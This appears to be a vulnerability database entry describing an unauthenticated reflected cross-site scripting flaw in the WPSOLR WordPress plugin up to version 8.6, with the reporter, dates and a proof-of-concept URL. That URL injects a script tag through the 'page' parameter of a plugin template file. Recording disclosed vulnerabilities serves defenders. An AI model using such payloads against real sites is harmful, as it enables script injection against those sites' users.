WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)

2016-04-14T00:00:00
ID WPEX-ID:8445
Type wpexploit
Reporter ethicalhack3r
Modified 2019-11-28T00:00:00

Description

WordPress Vulnerability - WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)

                                        
                                            http://www.example.com/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="&gt;&lt;script&gt;alert(1);&lt;/script&gt;&lt;"